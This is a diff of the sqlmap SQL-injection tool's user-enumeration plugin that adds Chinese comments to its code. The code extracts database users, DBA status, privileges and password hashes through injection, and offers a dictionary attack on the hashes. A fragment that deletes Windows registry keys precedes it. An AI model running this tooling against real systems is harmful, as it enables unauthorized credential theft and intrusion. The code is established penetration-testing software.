raise SqlmapMissingMandatoryOptionException(errMsg) raise SqlmapMissingMandatoryOptionException(errMsg) # 如果没有输入,则抛出缺少必要选项异常
else: else:
regVal = conf.regVal regVal = conf.regVal # 如果配置中指定了注册表值,则使用配置
message = "are you sure that you want to delete the Windows " message = "are you sure that you want to delete the Windows "
message += "registry path '%s\\%s? [y/N] " % (regKey, regVal) message += "registry path '%s\\%s? [y/N] " % (regKey, regVal)
if not readInput(message, default='N', boolean=True): if not readInput(message, default='N', boolean=True):
return return # 如果用户选择不删除,则返回
infoMsg = "deleting Windows registry path '%s\\%s'. " % (regKey, regVal) infoMsg = "deleting Windows registry path '%s\\%s'. " % (regKey, regVal)
infoMsg += "This will work only if the user running the database " infoMsg += "This will work only if the user running the database "
infoMsg += "process has privileges to modify the Windows registry." infoMsg += "process has privileges to modify the Windows registry."
logger.info(infoMsg) logger.info(infoMsg) # 打印删除注册表信息
self.delRegKey(regKey, regVal) self.delRegKey(regKey, regVal) # 删除注册表键值

@ -52,69 +52,100 @@ from thirdparty.six.moves import zip as _zip
class Users(object): class Users(object):
""" """
This class defines users' enumeration functionalities for plugins. This class defines users' enumeration functionalities for plugins.
这个类定义了插件的用户枚举功能
""" """
def __init__(self): def __init__(self):
kb.data.currentUser = "" # 初始化用户相关的数据存储
kb.data.isDba = None kb.data.currentUser = "" # 当前用户
kb.data.cachedUsers = [] kb.data.isDba = None # 是否是DBA
kb.data.cachedUsersPasswords = {} kb.data.cachedUsers = [] # 缓存的用户列表
kb.data.cachedUsersPrivileges = {} kb.data.cachedUsersPasswords = {} # 缓存的用户密码哈希
kb.data.cachedUsersRoles = {} kb.data.cachedUsersPrivileges = {} # 缓存的用户权限
kb.data.cachedUsersRoles = {} # 缓存的用户角色
def getCurrentUser(self): def getCurrentUser(self):
"""
Retrieves the current database user.
获取当前数据库用户
"""
infoMsg = "fetching current user" infoMsg = "fetching current user"
logger.info(infoMsg) logger.info(infoMsg)
# 获取当前用户的SQL查询语句
query = queries[Backend.getIdentifiedDbms()].current_user.query query = queries[Backend.getIdentifiedDbms()].current_user.query
# 如果当前用户没有被获取过,则进行获取
if not kb.data.currentUser: if not kb.data.currentUser:
kb.data.currentUser = unArrayizeValue(inject.getValue(query)) kb.data.currentUser = unArrayizeValue(inject.getValue(query))
return kb.data.currentUser return kb.data.currentUser
def isDba(self, user=None): def isDba(self, user=None):
"""
Tests if the current or specified user is a DBA.
测试当前或指定用户是否是DBA数据库管理员
Args:
user (str, optional): 要测试的用户默认为None表示测试当前用户
Returns:
bool: 是否是DBA
"""
infoMsg = "testing if current user is DBA" infoMsg = "testing if current user is DBA"
logger.info(infoMsg) logger.info(infoMsg)
query = None query = None
# 根据不同的数据库类型构造不同的SQL查询语句
if Backend.isDbms(DBMS.MYSQL): if Backend.isDbms(DBMS.MYSQL):
self.getCurrentUser() self.getCurrentUser() # 先获取当前用户
if Backend.isDbms(DBMS.MYSQL) and Backend.isFork(FORK.DRIZZLE): if Backend.isDbms(DBMS.MYSQL) and Backend.isFork(FORK.DRIZZLE):
kb.data.isDba = "root" in (kb.data.currentUser or "") kb.data.isDba = "root" in (kb.data.currentUser or "") # Drizzle数据库通过用户名判断是否为root用户
elif kb.data.currentUser: elif kb.data.currentUser:
query = queries[Backend.getIdentifiedDbms()].is_dba.query % kb.data.currentUser.split("@")[0] query = queries[Backend.getIdentifiedDbms()].is_dba.query % kb.data.currentUser.split("@")[0] # 构建查询语句判断是否为MySQL的DBA
elif Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE) and user is not None: elif Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE) and user is not None:
query = queries[Backend.getIdentifiedDbms()].is_dba.query2 % user query = queries[Backend.getIdentifiedDbms()].is_dba.query2 % user # 构建查询语句判断是否为SQL Server或Sybase的DBA
else: else:
query = queries[Backend.getIdentifiedDbms()].is_dba.query query = queries[Backend.getIdentifiedDbms()].is_dba.query # 构建查询语句判断是否为其他数据库的DBA
# 执行查询
if query: if query:
query = agent.forgeCaseStatement(query) query = agent.forgeCaseStatement(query) # 注入时构造Case语句
kb.data.isDba = inject.checkBooleanExpression(query) or False kb.data.isDba = inject.checkBooleanExpression(query) or False # 执行查询并判断是否为DBA
return kb.data.isDba return kb.data.isDba
def getUsers(self): def getUsers(self):
"""
Retrieves database users.
获取数据库用户
Returns:
list: 用户列表
"""
infoMsg = "fetching database users" infoMsg = "fetching database users"
logger.info(infoMsg) logger.info(infoMsg)
# 获取查询用户表的SQL查询语句
rootQuery = queries[Backend.getIdentifiedDbms()].users rootQuery = queries[Backend.getIdentifiedDbms()].users
# 判断是否需要使用不同的查询语句
condition = (Backend.isDbms(DBMS.MSSQL) and Backend.isVersionWithin(("2005", "2008"))) condition = (Backend.isDbms(DBMS.MSSQL) and Backend.isVersionWithin(("2005", "2008")))
condition |= (Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema) condition |= (Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema)
# 优先使用union, error, query技术进行查询否则使用盲注技术
if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct:
if Backend.isDbms(DBMS.MYSQL) and Backend.isFork(FORK.DRIZZLE): if Backend.isDbms(DBMS.MYSQL) and Backend.isFork(FORK.DRIZZLE):
query = rootQuery.inband.query3 query = rootQuery.inband.query3 # Drizzle数据库的查询语句
elif condition: elif condition:
query = rootQuery.inband.query2 query = rootQuery.inband.query2 # 条件判断下的查询语句
else: else:
query = rootQuery.inband.query query = rootQuery.inband.query # 通用查询语句
values = inject.getValue(query, blind=False, time=False) values = inject.getValue(query, blind=False, time=False) # 执行查询语句,获取用户列表
# 处理返回的用户列表
if not isNoneValue(values): if not isNoneValue(values):
kb.data.cachedUsers = [] kb.data.cachedUsers = []
for value in arrayizeValue(values): for value in arrayizeValue(values):
@ -122,18 +153,19 @@ class Users(object):
if not isNoneValue(value): if not isNoneValue(value):
kb.data.cachedUsers.append(value) kb.data.cachedUsers.append(value)
# 如果没有使用union, error, query技术获取到用户则使用盲注技术进行获取
if not kb.data.cachedUsers and isInferenceAvailable() and not conf.direct: if not kb.data.cachedUsers and isInferenceAvailable() and not conf.direct:
infoMsg = "fetching number of database users" infoMsg = "fetching number of database users"
logger.info(infoMsg) logger.info(infoMsg)
if Backend.isDbms(DBMS.MYSQL) and Backend.isFork(FORK.DRIZZLE): if Backend.isDbms(DBMS.MYSQL) and Backend.isFork(FORK.DRIZZLE):
query = rootQuery.blind.count3 query = rootQuery.blind.count3 # Drizzle数据库的查询语句
elif condition: elif condition:
query = rootQuery.blind.count2 query = rootQuery.blind.count2 # 条件判断下的查询语句
else: else:
query = rootQuery.blind.count query = rootQuery.blind.count # 通用查询语句
count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) # 获取用户数量
if count == 0: if count == 0:
return kb.data.cachedUsers return kb.data.cachedUsers
@ -142,8 +174,9 @@ class Users(object):
raise SqlmapNoneDataException(errMsg) raise SqlmapNoneDataException(errMsg)
plusOne = Backend.getIdentifiedDbms() in PLUS_ONE_DBMSES plusOne = Backend.getIdentifiedDbms() in PLUS_ONE_DBMSES
indexRange = getLimitRange(count, plusOne=plusOne) indexRange = getLimitRange(count, plusOne=plusOne) # 计算盲注的查询范围
# 循环盲注查询用户
for index in indexRange: for index in indexRange:
if Backend.getIdentifiedDbms() in (DBMS.SYBASE, DBMS.MAXDB): if Backend.getIdentifiedDbms() in (DBMS.SYBASE, DBMS.MAXDB):
query = rootQuery.blind.query % (kb.data.cachedUsers[-1] if kb.data.cachedUsers else " ") query = rootQuery.blind.query % (kb.data.cachedUsers[-1] if kb.data.cachedUsers else " ")
@ -166,8 +199,16 @@ class Users(object):
return kb.data.cachedUsers return kb.data.cachedUsers
def getPasswordHashes(self): def getPasswordHashes(self):
"""
Retrieves password hashes of database users.
获取数据库用户的密码哈希值
Returns:
dict: 用户名和密码哈希的字典
"""
infoMsg = "fetching database users password hashes" infoMsg = "fetching database users password hashes"
# 获取查询密码哈希的SQL查询语句
rootQuery = queries[Backend.getIdentifiedDbms()].passwords rootQuery = queries[Backend.getIdentifiedDbms()].passwords
if conf.user == CURRENT_USER: if conf.user == CURRENT_USER:
@ -177,7 +218,7 @@ class Users(object):
logger.info(infoMsg) logger.info(infoMsg)
if conf.user and Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): if conf.user and Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2):
conf.user = conf.user.upper() conf.user = conf.user.upper() # Oracle和DB2数据库的用户名为大写
if conf.user: if conf.user:
users = conf.user.split(',') users = conf.user.split(',')
@ -187,28 +228,31 @@ class Users(object):
parsedUser = re.search(r"['\"]?(.*?)['\"]?\@", user) parsedUser = re.search(r"['\"]?(.*?)['\"]?\@", user)
if parsedUser: if parsedUser:
users[users.index(user)] = parsedUser.groups()[0] users[users.index(user)] = parsedUser.groups()[0] # 处理MySQL的用户名格式去掉引号和@后面的部分
else: else:
users = [] users = []
users = [_ for _ in users if _] users = [_ for _ in users if _]
# 优先使用union, error, query技术进行查询否则使用盲注技术
if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct:
if Backend.isDbms(DBMS.MSSQL) and Backend.isVersionWithin(("2005", "2008")): if Backend.isDbms(DBMS.MSSQL) and Backend.isVersionWithin(("2005", "2008")):
query = rootQuery.inband.query2 query = rootQuery.inband.query2 # SQL Server 2005和2008的查询语句
else: else:
query = rootQuery.inband.query query = rootQuery.inband.query # 通用查询语句
condition = rootQuery.inband.condition condition = rootQuery.inband.condition # 查询条件
# 如果指定了用户,则加入查询条件
if conf.user: if conf.user:
query += " WHERE " query += " WHERE "
query += " OR ".join("%s = '%s'" % (condition, user) for user in sorted(users)) query += " OR ".join("%s = '%s'" % (condition, user) for user in sorted(users))
# 处理Sybase数据库的特殊情况
if Backend.isDbms(DBMS.SYBASE): if Backend.isDbms(DBMS.SYBASE):
getCurrentThreadData().disableStdOut = True getCurrentThreadData().disableStdOut = True
retVal = pivotDumpTable("(%s) AS %s" % (query, kb.aliasName), ['%s.name' % kb.aliasName, '%s.password' % kb.aliasName], blind=False) retVal = pivotDumpTable("(%s) AS %s" % (query, kb.aliasName), ['%s.name' % kb.aliasName, '%s.password' % kb.aliasName], blind=False) # 使用pivotDumpTable函数获取用户名和密码哈希
if retVal: if retVal:
for user, password in filterPairValues(_zip(retVal[0]["%s.name" % kb.aliasName], retVal[0]["%s.password" % kb.aliasName])): for user, password in filterPairValues(_zip(retVal[0]["%s.name" % kb.aliasName], retVal[0]["%s.password" % kb.aliasName])):
@ -219,13 +263,14 @@ class Users(object):
getCurrentThreadData().disableStdOut = False getCurrentThreadData().disableStdOut = False
else: else:
values = inject.getValue(query, blind=False, time=False) values = inject.getValue(query, blind=False, time=False) # 执行查询,获取用户名和密码哈希
if Backend.isDbms(DBMS.MSSQL) and isNoneValue(values): if Backend.isDbms(DBMS.MSSQL) and isNoneValue(values):
values = inject.getValue(query.replace("master.dbo.fn_varbintohexstr", "sys.fn_sqlvarbasetostr"), blind=False, time=False) values = inject.getValue(query.replace("master.dbo.fn_varbintohexstr", "sys.fn_sqlvarbasetostr"), blind=False, time=False) # SQL Server的特殊情况替换函数
elif Backend.isDbms(DBMS.MYSQL) and (isNoneValue(values) or all(len(value) == 2 and (isNullValue(value[1]) or isNoneValue(value[1])) for value in values)): elif Backend.isDbms(DBMS.MYSQL) and (isNoneValue(values) or all(len(value) == 2 and (isNullValue(value[1]) or isNoneValue(value[1])) for value in values)):
values = inject.getValue(query.replace("authentication_string", "password"), blind=False, time=False) values = inject.getValue(query.replace("authentication_string", "password"), blind=False, time=False) # MySQL的特殊情况替换字段
# 处理返回的用户名和密码哈希
for user, password in filterPairValues(values): for user, password in filterPairValues(values):
if not user or user == " ": if not user or user == " ":
continue continue
@ -237,19 +282,21 @@ class Users(object):
else: else:
kb.data.cachedUsersPasswords[user].append(password) kb.data.cachedUsersPasswords[user].append(password)
# 如果没有使用union, error, query技术获取到密码哈希则使用盲注技术进行获取
if not kb.data.cachedUsersPasswords and isInferenceAvailable() and not conf.direct: if not kb.data.cachedUsersPasswords and isInferenceAvailable() and not conf.direct:
fallback = False fallback = False
if not len(users): if not len(users):
users = self.getUsers() users = self.getUsers() # 先获取用户列表
if Backend.isDbms(DBMS.MYSQL): if Backend.isDbms(DBMS.MYSQL):
for user in users: for user in users:
parsedUser = re.search(r"['\"]?(.*?)['\"]?\@", user) parsedUser = re.search(r"['\"]?(.*?)['\"]?\@", user)
if parsedUser: if parsedUser:
users[users.index(user)] = parsedUser.groups()[0] users[users.index(user)] = parsedUser.groups()[0] # 处理MySQL的用户名格式去掉引号和@后面的部分
# 处理Sybase数据库的特殊情况
if Backend.isDbms(DBMS.SYBASE): if Backend.isDbms(DBMS.SYBASE):
getCurrentThreadData().disableStdOut = True getCurrentThreadData().disableStdOut = True
@ -268,8 +315,9 @@ class Users(object):
getCurrentThreadData().disableStdOut = False getCurrentThreadData().disableStdOut = False
else: else:
retrievedUsers = set() retrievedUsers = set() # 已获取密码哈希的用户
# 循环盲注查询密码哈希
for user in users: for user in users:
user = unArrayizeValue(user) user = unArrayizeValue(user)
@ -277,26 +325,26 @@ class Users(object):
continue continue
if Backend.getIdentifiedDbms() in (DBMS.INFORMIX, DBMS.VIRTUOSO): if Backend.getIdentifiedDbms() in (DBMS.INFORMIX, DBMS.VIRTUOSO):
count = 1 count = 1 # Informix和Virtuoso数据库的特殊情况直接查询密码哈希
else: else:
infoMsg = "fetching number of password hashes " infoMsg = "fetching number of password hashes "
infoMsg += "for user '%s'" % user infoMsg += "for user '%s'" % user
logger.info(infoMsg) logger.info(infoMsg)
if Backend.isDbms(DBMS.MSSQL) and Backend.isVersionWithin(("2005", "2008")): if Backend.isDbms(DBMS.MSSQL) and Backend.isVersionWithin(("2005", "2008")):
query = rootQuery.blind.count2 % user query = rootQuery.blind.count2 % user # SQL Server 2005和2008的查询语句
else: else:
query = rootQuery.blind.count % user query = rootQuery.blind.count % user # 通用查询语句
count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) # 获取密码哈希数量
if not isNumPosStrValue(count): if not isNumPosStrValue(count):
if Backend.isDbms(DBMS.MSSQL): if Backend.isDbms(DBMS.MSSQL):
fallback = True fallback = True
count = inject.getValue(query.replace("master.dbo.fn_varbintohexstr", "sys.fn_sqlvarbasetostr"), union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) count = inject.getValue(query.replace("master.dbo.fn_varbintohexstr", "sys.fn_sqlvarbasetostr"), union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) # SQL Server的特殊情况替换函数
elif Backend.isDbms(DBMS.MYSQL): elif Backend.isDbms(DBMS.MYSQL):
fallback = True fallback = True
count = inject.getValue(query.replace("authentication_string", "password"), union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) count = inject.getValue(query.replace("authentication_string", "password"), union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) # MySQL的特殊情况替换字段
if not isNumPosStrValue(count): if not isNumPosStrValue(count):
warnMsg = "unable to retrieve the number of password " warnMsg = "unable to retrieve the number of password "
@ -310,33 +358,34 @@ class Users(object):
passwords = [] passwords = []
plusOne = Backend.getIdentifiedDbms() in PLUS_ONE_DBMSES plusOne = Backend.getIdentifiedDbms() in PLUS_ONE_DBMSES
indexRange = getLimitRange(count, plusOne=plusOne) indexRange = getLimitRange(count, plusOne=plusOne) # 计算盲注的查询范围
# 循环盲注查询密码哈希
for index in indexRange: for index in indexRange:
if Backend.isDbms(DBMS.MSSQL): if Backend.isDbms(DBMS.MSSQL):
if Backend.isVersionWithin(("2005", "2008")): if Backend.isVersionWithin(("2005", "2008")):
query = rootQuery.blind.query2 % (user, index, user) query = rootQuery.blind.query2 % (user, index, user) # SQL Server 2005和2008的查询语句
else: else:
query = rootQuery.blind.query % (user, index, user) query = rootQuery.blind.query % (user, index, user) # 通用查询语句
if fallback: if fallback:
query = query.replace("master.dbo.fn_varbintohexstr", "sys.fn_sqlvarbasetostr") query = query.replace("master.dbo.fn_varbintohexstr", "sys.fn_sqlvarbasetostr") # SQL Server的特殊情况替换函数
elif Backend.getIdentifiedDbms() in (DBMS.INFORMIX, DBMS.VIRTUOSO): elif Backend.getIdentifiedDbms() in (DBMS.INFORMIX, DBMS.VIRTUOSO):
query = rootQuery.blind.query % (user,) query = rootQuery.blind.query % (user,) # Informix和Virtuoso数据库的特殊情况
elif Backend.isDbms(DBMS.HSQLDB): elif Backend.isDbms(DBMS.HSQLDB):
query = rootQuery.blind.query % (index, user) query = rootQuery.blind.query % (index, user) # HSQLDB数据库的特殊情况
else: else:
query = rootQuery.blind.query % (user, index) query = rootQuery.blind.query % (user, index) # 通用查询语句
if Backend.isDbms(DBMS.MYSQL): if Backend.isDbms(DBMS.MYSQL):
if fallback: if fallback:
query = query.replace("authentication_string", "password") query = query.replace("authentication_string", "password") # MySQL的特殊情况替换字段
password = unArrayizeValue(inject.getValue(query, union=False, error=False)) password = unArrayizeValue(inject.getValue(query, union=False, error=False))
password = parsePasswordHash(password) password = parsePasswordHash(password) # 解析密码哈希
passwords.append(password) passwords.append(password)
@ -355,26 +404,37 @@ class Users(object):
logger.error(errMsg) logger.error(errMsg)
else: else:
for user in kb.data.cachedUsersPasswords: for user in kb.data.cachedUsersPasswords:
kb.data.cachedUsersPasswords[user] = list(set(kb.data.cachedUsersPasswords[user])) kb.data.cachedUsersPasswords[user] = list(set(kb.data.cachedUsersPasswords[user])) # 去重密码哈希
storeHashesToFile(kb.data.cachedUsersPasswords) storeHashesToFile(kb.data.cachedUsersPasswords) # 保存密码哈希到文件
message = "do you want to perform a dictionary-based attack " message = "do you want to perform a dictionary-based attack "
message += "against retrieved password hashes? [Y/n/q]" message += "against retrieved password hashes? [Y/n/q]"
choice = readInput(message, default='Y').upper() choice = readInput(message, default='Y').upper() # 提示是否进行字典攻击
if choice == 'N': if choice == 'N':
pass pass
elif choice == 'Q': elif choice == 'Q':
raise SqlmapUserQuitException raise SqlmapUserQuitException
else: else:
attackCachedUsersPasswords() attackCachedUsersPasswords() # 进行字典攻击
return kb.data.cachedUsersPasswords return kb.data.cachedUsersPasswords
def getPrivileges(self, query2=False): def getPrivileges(self, query2=False):
"""
Retrieves privileges of database users.
获取数据库用户的权限
Args:
query2 (bool, optional): 是否使用第二种查询方式默认为False
Returns:
tuple: 用户名和权限的字典以及DBA用户的集合
"""
infoMsg = "fetching database users privileges" infoMsg = "fetching database users privileges"
# 获取查询权限的SQL查询语句
rootQuery = queries[Backend.getIdentifiedDbms()].privileges rootQuery = queries[Backend.getIdentifiedDbms()].privileges
if conf.user == CURRENT_USER: if conf.user == CURRENT_USER:
@ -401,36 +461,38 @@ class Users(object):
users = [_ for _ in users if _] users = [_ for _ in users if _]
# Set containing the list of DBMS administrators # Set containing the list of DBMS administrators
areAdmins = set() areAdmins = set() # 存储DBA用户的集合
if not kb.data.cachedUsersPrivileges and any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: if not kb.data.cachedUsersPrivileges and any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct:
if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema: if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema:
query = rootQuery.inband.query2 query = rootQuery.inband.query2 # MySQL 5.0以下版本的查询语句
condition = rootQuery.inband.condition2 condition = rootQuery.inband.condition2 # MySQL 5.0以下版本的查询条件
elif Backend.isDbms(DBMS.ORACLE) and query2: elif Backend.isDbms(DBMS.ORACLE) and query2:
query = rootQuery.inband.query2 query = rootQuery.inband.query2 # Oracle的第二种查询方式
condition = rootQuery.inband.condition2 condition = rootQuery.inband.condition2 # Oracle的第二种查询条件
else: else:
query = rootQuery.inband.query query = rootQuery.inband.query # 通用查询语句
condition = rootQuery.inband.condition condition = rootQuery.inband.condition # 通用查询条件
# 如果指定了用户,则加入查询条件
if conf.user: if conf.user:
query += " WHERE " query += " WHERE "
if Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema: if Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema:
query += " OR ".join("%s LIKE '%%%s%%'" % (condition, user) for user in sorted(users)) query += " OR ".join("%s LIKE '%%%s%%'" % (condition, user) for user in sorted(users)) # MySQL 5.0以上版本的查询条件
else: else:
query += " OR ".join("%s = '%s'" % (condition, user) for user in sorted(users)) query += " OR ".join("%s = '%s'" % (condition, user) for user in sorted(users)) # 通用查询条件
values = inject.getValue(query, blind=False, time=False) values = inject.getValue(query, blind=False, time=False) # 执行查询语句,获取权限信息
if not values and Backend.isDbms(DBMS.ORACLE) and not query2: if not values and Backend.isDbms(DBMS.ORACLE) and not query2:
infoMsg = "trying with table 'USER_SYS_PRIVS'" infoMsg = "trying with table 'USER_SYS_PRIVS'"
logger.info(infoMsg) logger.info(infoMsg)
return self.getPrivileges(query2=True) return self.getPrivileges(query2=True) # 如果没有获取到权限信息,尝试使用第二种查询方式
if not isNoneValue(values): if not isNoneValue(values):
# 处理返回的权限信息
for value in values: for value in values:
user = None user = None
privileges = set() privileges = set()
@ -438,7 +500,7 @@ class Users(object):
for count in xrange(0, len(value or [])): for count in xrange(0, len(value or [])):
# The first column is always the username # The first column is always the username
if count == 0: if count == 0:
user = value[count] user = value[count] # 获取用户名
# The other columns are the privileges # The other columns are the privileges
else: else:
@ -451,23 +513,23 @@ class Users(object):
# True, 0 otherwise # True, 0 otherwise
if Backend.isDbms(DBMS.PGSQL) and getUnicode(privilege).isdigit(): if Backend.isDbms(DBMS.PGSQL) and getUnicode(privilege).isdigit():
if int(privilege) == 1 and count in PGSQL_PRIVS: if int(privilege) == 1 and count in PGSQL_PRIVS:
privileges.add(PGSQL_PRIVS[count]) privileges.add(PGSQL_PRIVS[count]) # PostgreSQL的权限处理
# In MySQL >= 5.0 and Oracle we get the list # In MySQL >= 5.0 and Oracle we get the list
# of privileges as string # of privileges as string
elif Backend.isDbms(DBMS.ORACLE) or (Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema) or Backend.getIdentifiedDbms() in (DBMS.VERTICA, DBMS.MIMERSQL, DBMS.CUBRID): elif Backend.isDbms(DBMS.ORACLE) or (Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema) or Backend.getIdentifiedDbms() in (DBMS.VERTICA, DBMS.MIMERSQL, DBMS.CUBRID):
privileges.add(privilege) privileges.add(privilege) # MySQL 5.0以上版本和Oracle的权限处理
# In MySQL < 5.0 we get Y if the privilege is # In MySQL < 5.0 we get Y if the privilege is
# True, N otherwise # True, N otherwise
elif Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema: elif Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema:
if privilege.upper() == 'Y': if privilege.upper() == 'Y':
privileges.add(MYSQL_PRIVS[count]) privileges.add(MYSQL_PRIVS[count]) # MySQL 5.0以下版本的权限处理
# In Firebird we get one letter for each privilege # In Firebird we get one letter for each privilege
elif Backend.isDbms(DBMS.FIREBIRD): elif Backend.isDbms(DBMS.FIREBIRD):
if privilege.strip() in FIREBIRD_PRIVS: if privilege.strip() in FIREBIRD_PRIVS:
privileges.add(FIREBIRD_PRIVS[privilege.strip()]) privileges.add(FIREBIRD_PRIVS[privilege.strip()]) # Firebird的权限处理
# In DB2 we get Y or G if the privilege is # In DB2 we get Y or G if the privilege is
# True, N otherwise # True, N otherwise
@ -487,21 +549,21 @@ class Users(object):
i += 1 i += 1
privileges.add(privilege) privileges.add(privilege) # DB2的权限处理
if user in kb.data.cachedUsersPrivileges: if user in kb.data.cachedUsersPrivileges:
kb.data.cachedUsersPrivileges[user] = list(privileges.union(kb.data.cachedUsersPrivileges[user])) kb.data.cachedUsersPrivileges[user] = list(privileges.union(kb.data.cachedUsersPrivileges[user])) # 合并权限
else: else:
kb.data.cachedUsersPrivileges[user] = list(privileges) kb.data.cachedUsersPrivileges[user] = list(privileges)
if not kb.data.cachedUsersPrivileges and isInferenceAvailable() and not conf.direct: if not kb.data.cachedUsersPrivileges and isInferenceAvailable() and not conf.direct:
if Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema: if Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema:
conditionChar = "LIKE" conditionChar = "LIKE" # MySQL 5.0以上版本的模糊查询
else: else:
conditionChar = "=" conditionChar = "=" # 通用查询
if not len(users): if not len(users):
users = self.getUsers() users = self.getUsers() # 获取用户列表
if Backend.isDbms(DBMS.MYSQL): if Backend.isDbms(DBMS.MYSQL):
for user in users: for user in users:
@ -510,33 +572,34 @@ class Users(object):
if parsedUser: if parsedUser:
users[users.index(user)] = parsedUser.groups()[0] users[users.index(user)] = parsedUser.groups()[0]
retrievedUsers = set() retrievedUsers = set() # 已获取权限的用户
# 循环盲注查询权限
for user in users: for user in users:
outuser = user outuser = user
if user in retrievedUsers: if user in retrievedUsers:
continue continue
if Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema: if Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema:
user = "%%%s%%" % user user = "%%%s%%" % user # MySQL 5.0以上版本的模糊查询
if Backend.isDbms(DBMS.INFORMIX): if Backend.isDbms(DBMS.INFORMIX):
count = 1 count = 1 # Informix数据库的特殊情况直接查询权限
else: else:
infoMsg = "fetching number of privileges " infoMsg = "fetching number of privileges "
infoMsg += "for user '%s'" % outuser infoMsg += "for user '%s'" % outuser
logger.info(infoMsg) logger.info(infoMsg)
if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema: if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema:
query = rootQuery.blind.count2 % user query = rootQuery.blind.count2 % user # MySQL 5.0以下版本的查询语句
elif Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema: elif Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema:
query = rootQuery.blind.count % (conditionChar, user) query = rootQuery.blind.count % (conditionChar, user) # MySQL 5.0以上版本的查询语句
elif Backend.isDbms(DBMS.ORACLE) and query2: elif Backend.isDbms(DBMS.ORACLE) and query2:
query = rootQuery.blind.count2 % user query = rootQuery.blind.count2 % user # Oracle的第二种查询方式
else: else:
query = rootQuery.blind.count % user query = rootQuery.blind.count % user # 通用查询语句
count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) # 获取权限数量
if not isNumPosStrValue(count): if not isNumPosStrValue(count):
if not retrievedUsers and Backend.isDbms(DBMS.ORACLE) and not query2: if not retrievedUsers and Backend.isDbms(DBMS.ORACLE) and not query2:
@ -556,21 +619,22 @@ class Users(object):
privileges = set() privileges = set()
plusOne = Backend.getIdentifiedDbms() in PLUS_ONE_DBMSES plusOne = Backend.getIdentifiedDbms() in PLUS_ONE_DBMSES
indexRange = getLimitRange(count, plusOne=plusOne) indexRange = getLimitRange(count, plusOne=plusOne) # 计算盲注的查询范围
# 循环盲注查询权限
for index in indexRange: for index in indexRange:
if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema: if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema:
query = rootQuery.blind.query2 % (user, index) query = rootQuery.blind.query2 % (user, index) # MySQL 5.0以下版本的查询语句
elif Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema: elif Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema:
query = rootQuery.blind.query % (conditionChar, user, index) query = rootQuery.blind.query % (conditionChar, user, index) # MySQL 5.0以上版本的查询语句
elif Backend.isDbms(DBMS.ORACLE) and query2: elif Backend.isDbms(DBMS.ORACLE) and query2:
query = rootQuery.blind.query2 % (user, index) query = rootQuery.blind.query2 % (user, index) # Oracle的第二种查询方式
elif Backend.isDbms(DBMS.FIREBIRD): elif Backend.isDbms(DBMS.FIREBIRD):
query = rootQuery.blind.query % (index, user) query = rootQuery.blind.query % (index, user) # Firebird数据库的查询语句
elif Backend.isDbms(DBMS.INFORMIX): elif Backend.isDbms(DBMS.INFORMIX):
query = rootQuery.blind.query % (user,) query = rootQuery.blind.query % (user,) # Informix数据库的查询语句
else: else:
query = rootQuery.blind.query % (user, index) query = rootQuery.blind.query % (user, index) # 通用查询语句
privilege = unArrayizeValue(inject.getValue(query, union=False, error=False)) privilege = unArrayizeValue(inject.getValue(query, union=False, error=False))
